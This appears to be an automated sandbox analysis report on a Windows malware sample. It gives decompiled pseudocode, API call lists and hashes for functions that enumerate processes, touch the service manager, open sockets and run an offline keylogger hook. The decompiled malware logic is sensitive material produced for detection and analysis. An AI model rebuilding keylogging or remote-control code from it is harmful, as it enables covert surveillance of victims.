                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 004117B5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00411280), ref: 004117BA
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                                                                • String ID:
                                                                                • API String ID: 858787766-0
                                                                                • Opcode ID: f8fd2a6c5f299153eb193c66ec477f5c61babc6e911454b5a8d4cefe462bdfda
                                                                                • Instruction ID: b89de82e4dcd107d12e5f2e386de490b738cfb46e6195f9b9e1884d6b0831d1c
                                                                                • Opcode Fuzzy Hash: f8fd2a6c5f299153eb193c66ec477f5c61babc6e911454b5a8d4cefe462bdfda
                                                                                • Instruction Fuzzy Hash: 23F0AF71100618EFD3106FB4AC88EFF3F6CEF89390B044025FA06921A0DB648D468AE9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040D761, Relevance: 12.0, APIs: 8, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 43%
                                                                                			E0040D761(void* __ecx, void* __eflags) {
				void* _t15;
				void* _t20;
				void* _t30;
				void* _t32;
				void* _t34;
				void* _t38;

				_t38 = __eflags;
				_t20 = __ecx;
				__imp___itoa(GetCurrentProcessId(), _t32 - 0x30, 0xa);
				_t15 = _t32 - 0x60;
				L00414140();
				L00414170();
				E004020C2(0x41be70, 0x4f, _t34);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t15, _t15, E00409EAA(_t38, _t32 - 0x150), _t30, _t32 - 0x30, _t20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				E004017DD(_t32 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}









                                                                                0x0040d761
                                                                                0x0040d761
                                                                                0x0040d76e
                                                                                0x0040d78a
                                                                                0x0040d78e
                                                                                0x0040d798
                                                                                0x0040d7a7
                                                                                0x0040d7af
                                                                                0x0040e69b
                                                                                0x0040e6a4
                                                                                0x0040e6ac
                                                                                0x0040e6b5
                                                                                0x0040e6c1

                                                                                APIs
                                                                                • GetCurrentProcessId.KERNEL32(?,0000000A), ref: 0040D767
                                                                                • _itoa.MSVCRT ref: 0040D76E
                                                                                  • Part of subcall function 00409EAA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409EBB
                                                                                  • Part of subcall function 00409EAA: CreateToolhelp32Snapshot.KERNEL32 ref: 00409ECF
                                                                                  • Part of subcall function 00409EAA: Process32FirstW.KERNEL32(00000000,?), ref: 00409EF0
                                                                                  • Part of subcall function 00409EAA: Process32NextW.KERNEL32(00000000,0000022C), ref: 00409EFD
                                                                                  • Part of subcall function 00409EAA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00000000,0000022C,00000000,?,00000002,00000000), ref: 00409F1E
                                                                                  • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409F99
                                                                                  • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FA9
                                                                                  • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FB6
                                                                                  • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4), ref: 00409FC6
                                                                                  • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004166F4,00000000), ref: 00409FD3
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?), ref: 0040D78E
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040D798
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004F), ref: 0040D7AF
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E69B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@0@D@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@0@$??0?$basic_string@V10@$Process32$CreateCurrentD@1@@FirstG@1@@G@2@@std@@G@std@@NextProcessSnapshotToolhelp32V01@@_itoa
                                                                                • String ID:
                                                                                • API String ID: 1707565870-0
                                                                                • Opcode ID: 5cbb7f8af44e19eeec85372959ad9ef19753e3bb0ef527fc91e73b5a23a7a717
                                                                                • Instruction ID: 286f1569ef994b2bf272d8202e8d00d479d3e157814ab9f0be6f7aa08cfd563f
                                                                                • Opcode Fuzzy Hash: 5cbb7f8af44e19eeec85372959ad9ef19753e3bb0ef527fc91e73b5a23a7a717
                                                                                • Instruction Fuzzy Hash: CD01217291021CEBCB05ABE1EC4DDEE7738FBA4306F00443AF506A7091EB745949CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041230A, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90sleeplibraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 50%
                                                                                			E0041230A(void* __ecx, intOrPtr __edx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v44;
				char _v52;
				char _v60;
				char _v68;
				char _v76;
				char _v84;
				void* _t39;
				void* _t41;
				void* _t45;
				void* _t50;
				void* _t54;
				intOrPtr _t56;
				intOrPtr* _t59;

				_t56 = __edx;
				_t54 = __ecx;
				_t59 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetSystemTimes");
				 *_t59( &_v44,  &_v60,  &_v76);
				Sleep(0x3e8);
				 *_t59( &_v52,  &_v68,  &_v84);
				_v28 = E004123EE(_t54,  &_v44);
				_v24 = _t56;
				_v20 = E004123EE(_t54,  &_v52);
				_v16 = _t56;
				_t39 = E004123EE(_t54,  &_v60);
				_v32 = _t56;
				_t41 = E004123EE(_t54,  &_v68);
				_v12 = E004123EE(_t54,  &_v76);
				asm("sbb edi, [ebp-0x1c]");
				_v8 = _t56;
				_v32 = _t56;
				_t45 = E004123EE(_t54,  &_v84);
				asm("sbb edi, [ebp-0x4]");
				asm("sbb ecx, [ebp-0xc]");
				asm("adc ecx, [ebp-0x1c]");
				asm("adc ecx, [ebp-0x14]");
				_t50 = E00413F70(_t45 - _v12 - _v20 + _t41 - _t39 + _v28, _t56, 0x64, 0);
				asm("adc edi, [ebp-0x1c]");
				return E00413F00(_t50, _t56, _t45 - _v12 + _t41 - _t39, _t56);
			}























                                                                                0x0041230a
                                                                                0x0041230a
                                                                                0x0041232a
                                                                                0x00412338
                                                                                0x0041233f
                                                                                0x00412351
                                                                                0x0041235c
                                                                                0x00412363
                                                                                0x0041236b
                                                                                0x00412372
                                                                                0x00412375
                                                                                0x00412380
                                                                                0x00412383
                                                                                0x00412397
                                                                                0x0041239a
                                                                                0x004123a1
                                                                                0x004123a6
                                                                                0x004123a9
                                                                                0x004123bc
                                                                                0x004123c6
                                                                                0x004123cb
                                                                                0x004123d1
                                                                                0x004123d6
                                                                                0x004123dd
                                                                                0x004123ed

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,0041B320), ref: 0041231D
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00412324
                                                                                • Sleep.KERNEL32(000003E8,?,0041B320), ref: 0041233F
                                                                                • __aulldiv.LIBCMT ref: 004123E4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProcSleep__aulldiv
                                                                                • String ID: GetSystemTimes$kernel32.dll
                                                                                • API String ID: 482274533-1354958348
                                                                                • Opcode ID: 46a1d328fedf844ba606f0e8673ace6c540685b211b4bcf1c735d680270a1030
                                                                                • Instruction ID: 24784d85835a85e8dafa53e59313101cf39276f4ebe332ff0eed9d8e085b34e9
                                                                                • Opcode Fuzzy Hash: 46a1d328fedf844ba606f0e8673ace6c540685b211b4bcf1c735d680270a1030
                                                                                • Instruction Fuzzy Hash: 9231CD72D0021DABCB10EBF5CD85DEFBBBCAE48714F04412AF515F3245D678A6498BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00410E53, Relevance: 10.6, APIs: 7, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 24%
                                                                                			E00410E53(void* __eflags, char _a4) {
				char _v20;
				char _v36;
				char _v52;
				void* _t16;
				char* _t18;
				void* _t19;
				void* _t36;

				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z();
				E00402038(0x41c130);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				E0040209B(0x41c130,  &_a4);
				_t16 = E00412855(0x41c130,  &_v36, E004113C9( &_v52));
				_t18 =  &_v20;
				L00414140();
				L00414140();
				_t19 = E004020C2(0x41c130, 0x34, _t36 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t18, _t18,  &_a4, 0x41b310, _t16, 0x41c130);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				E00402118(0x41c130, E00410F04);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t19;
			}










                                                                                0x00410e65
                                                                                0x00410e72
                                                                                0x00410e83
                                                                                0x00410e84
                                                                                0x00410e85
                                                                                0x00410e86
                                                                                0x00410e87
                                                                                0x00410e9a
                                                                                0x00410eac
                                                                                0x00410eb0
                                                                                0x00410eba
                                                                                0x00410ec6
                                                                                0x00410ed0
                                                                                0x00410ed9
                                                                                0x00410ee2
                                                                                0x00410eef
                                                                                0x00410ef7
                                                                                0x00410f03

                                                                                APIs
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00410E65
                                                                                  • Part of subcall function 00402038: #23.WS2_32(00000000,00000001,00000006,0041BCB0,0040C8BF), ref: 00402053
                                                                                  • Part of subcall function 0040209B: #4.WS2_32(0041BE70,0041BE74,00000010,?,0041B320,?,0040CA5C), ref: 004020B1
                                                                                  • Part of subcall function 004113C9: OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 004113D9
                                                                                  • Part of subcall function 004113C9: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004113F2
                                                                                  • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                                                                  • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                                                                  • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000,?,?,00000000,?), ref: 00410EB0
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,?), ref: 00410EBA
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000034,?,?,?,?,00000000,?), ref: 00410ED0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410ED9
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410EE2
                                                                                  • Part of subcall function 00402118: CreateThread.KERNEL32(00000000,00000000,00402137,?,00000000,00000000), ref: 0040212D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410EF7
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@$D@2@@0@Hstd@@V01@@V10@0@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CreateD@1@@G@1@@ManagerOpenThreadV01@
                                                                                • String ID:
                                                                                • API String ID: 2196721692-0
                                                                                • Opcode ID: e139c00cd810f7f7f7039f085b2d95c45cf7812f598c374a546ffc2f4f333034
                                                                                • Instruction ID: 1193976e1187dff15876f75262123416920ecc17f0a83cfc990a5670802f72a4
                                                                                • Opcode Fuzzy Hash: e139c00cd810f7f7f7039f085b2d95c45cf7812f598c374a546ffc2f4f333034
                                                                                • Instruction Fuzzy Hash: 1811A772A0021CA7CB00FBA1EC4ACEF776CEA84344704443EFE02E7191DA785948C7E8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00412881, Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 43%
                                                                                			E00412881(void* __eax, intOrPtr _a4, void* _a8, char _a11) {
				char _v20;
				void* _t15;
				void* _t18;
				signed int _t20;
				void* _t25;
				signed int _t28;
				signed int _t29;
				signed int _t36;
				void* _t46;
				signed int _t57;
				void* _t58;

				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				_t57 = __eax + 2;
				_t15 = _t57 + _t57;
				L00413E84();
				_t25 = _t15;
				_t28 = _t57;
				_t46 = _t25;
				_t29 = _t28 >> 2;
				_t18 = memset(_t46 + _t29, memset(_t46, 0, _t29 << 2), (_t28 & 0x00000003) << 0);
				_t6 = _t57 - 2; // 0x0
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t15);
				_t58 = _t18;
				_t36 = _t6 >> 2;
				_t20 = memcpy(_t25, _t58, _t36 << 2);
				memcpy(_t58 + _t36 + _t36, _t58, _t20 & 0x00000003);
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t25,  &_a11);
				L00413EBE();
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z( &_v20, _t25);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _a4;
			}














                                                                                0x0041288d
                                                                                0x00412896
                                                                                0x00412897
                                                                                0x0041289b
                                                                                0x004128a1
                                                                                0x004128a3
                                                                                0x004128a9
                                                                                0x004128ab
                                                                                0x004128b5
                                                                                0x004128ba
                                                                                0x004128bd
                                                                                0x004128c3
                                                                                0x004128cb
                                                                                0x004128ce
                                                                                0x004128d9
                                                                                0x004128df
                                                                                0x004128e6
                                                                                0x004128f3
                                                                                0x004128fc
                                                                                0x00412909

                                                                                APIs
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@??3@?c_str@?$basic_string@?length@?$basic_string@G@1@@V01@@
                                                                                • String ID:
                                                                                • API String ID: 391609400-0
                                                                                • Opcode ID: 2c38c628a4fd7b8da5d43779936f939065aed8b2a896c4cb609fac90e9bf1ea2
                                                                                • Instruction ID: aeeabeca61c13fa181a61ba6e56d16b1543aaa328dd705508f0d2aa2ccd85a4a
                                                                                • Opcode Fuzzy Hash: 2c38c628a4fd7b8da5d43779936f939065aed8b2a896c4cb609fac90e9bf1ea2
                                                                                • Instruction Fuzzy Hash: A50180326005199B8B08EF68EC958EFB7EAFB88255744443EF907C7390DE709A05CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00413B0F, Relevance: 10.6, APIs: 7, Instructions: 55windowstringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 28%
                                                                                			E00413B0F() {
				struct tagMSG _v32;
				char _v292;
				int _t15;

				GetModuleFileNameA(0,  &_v292, 0x104);
				 *0x41c204 = E00413BC8();
				0x41c200->cbSize = 0x58;
				 *0x41c208 = 1;
				 *0x41c210 = 0x401;
				 *0x41c214 = ExtractIconA(0,  &_v292, 0);
				lstrcpynA(0x41c218,  *0x41b160, 0x40);
				 *0x41c20c = 7;
				Shell_NotifyIconA(0, 0x41c200);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v32);
				while(1) {
					_t15 = GetMessageA();
					if(_t15 == 0) {
						break;
					}
					TranslateMessage( &_v32);
					DispatchMessageA( &_v32);
					_push(0);
					_push(0);
					_push(0);
					_push( &_v32);
				}
				return _t15;
			}






                                                                                0x00413b29
                                                                                0x00413b34
                                                                                0x00413b42
                                                                                0x00413b4c
                                                                                0x00413b56
                                                                                0x00413b68
                                                                                0x00413b78
                                                                                0x00413b84
                                                                                0x00413b8e
                                                                                0x00413b9a
                                                                                0x00413b9b
                                                                                0x00413b9f
                                                                                0x00413ba0
                                                                                0x00413ba1
                                                                                0x00413ba1
                                                                                0x00413ba5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00413bab
                                                                                0x00413bb5
                                                                                0x00413bbb
                                                                                0x00413bbc
                                                                                0x00413bc0
                                                                                0x00413bc1
                                                                                0x00413bc1
                                                                                0x00413bc7

                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00413B29
                                                                                  • Part of subcall function 00413BC8: RegisterClassExA.USER32(00000030), ref: 00413C0E
                                                                                  • Part of subcall function 00413BC8: CreateWindowExA.USER32 ref: 00413C29
                                                                                  • Part of subcall function 00413BC8: GetLastError.KERNEL32(?,00000000), ref: 00413C33
                                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 00413B60
                                                                                • lstrcpynA.KERNEL32(0041C218,00000040), ref: 00413B78
                                                                                • Shell_NotifyIconA.SHELL32(00000000,0041C200), ref: 00413B8E
                                                                                • GetMessageA.USER32 ref: 00413BA1
                                                                                • TranslateMessage.USER32(?), ref: 00413BAB
                                                                                • DispatchMessageA.USER32 ref: 00413BB5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 1970332568-0
                                                                                • Opcode ID: 5db49f3c559ac23c5e5b4a4de78144058b1f4a1bd7bc86c7a9fc6dac82a1e8bb
                                                                                • Instruction ID: 0139c5569a5099b89989dc8841d294567b871d20cbef476d366633a748243c7d
                                                                                • Opcode Fuzzy Hash: 5db49f3c559ac23c5e5b4a4de78144058b1f4a1bd7bc86c7a9fc6dac82a1e8bb
                                                                                • Instruction Fuzzy Hash: DA1121B2841215BBD7109BD1EC4CEDB3BBCEB49351F008166B615D2051D7B89545CBA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405D50, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,0041BCB0,?,?,004054E4), ref: 00405D76
                                                                                  • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,00017838,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                                                                  • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                                                                  • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                                                                  • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                                                                  • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                                                                  • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                                                                  • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                                                                  • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                                                                  • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                                                                  • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                                                                  • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                                                                  • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                                                                  • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                                                                  • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                                                                  • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,0041BCB0,?,?,004054E4), ref: 00405D8D
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405DA1
                                                                                • UnhookWindowsHookEx.USER32(00000000), ref: 00405DC0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@V01@$D@2@@0@Hstd@@V?$basic_string@Y?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@EventHookLocalTimeUnhookV01@@V10@V10@@Windowsfreemallocsprintf
                                                                                • String ID: Offline Keylogger Stopped$[INFO]
                                                                                • API String ID: 2222684746-1731565019
                                                                                • Opcode ID: 73c64669d0e90f52680bcd42a3afb3a3acb1e5eb000d97594ebbd2d1d962b6da
                                                                                • Instruction ID: e64c4fb295ac971b427419d3758f0b97408fd66a05d8179c7aec1af0dcca75a5
                                                                                • Opcode Fuzzy Hash: 73c64669d0e90f52680bcd42a3afb3a3acb1e5eb000d97594ebbd2d1d962b6da
                                                                                • Instruction Fuzzy Hash: 0C01D674910B046BE7107725C84D7FB7EBCDF81750F44846BE842922C1D7B869458FAA
                                                                                Uniqueness

